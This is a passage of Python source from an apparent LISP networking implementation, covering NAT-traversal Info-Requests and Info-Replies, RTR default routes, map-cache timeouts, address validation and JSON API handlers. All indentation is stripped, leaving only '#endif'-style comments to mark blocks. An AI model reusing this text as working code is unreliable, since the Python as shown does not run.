mr.map_resolver)
#
# Set global timestamp for rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reasssigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
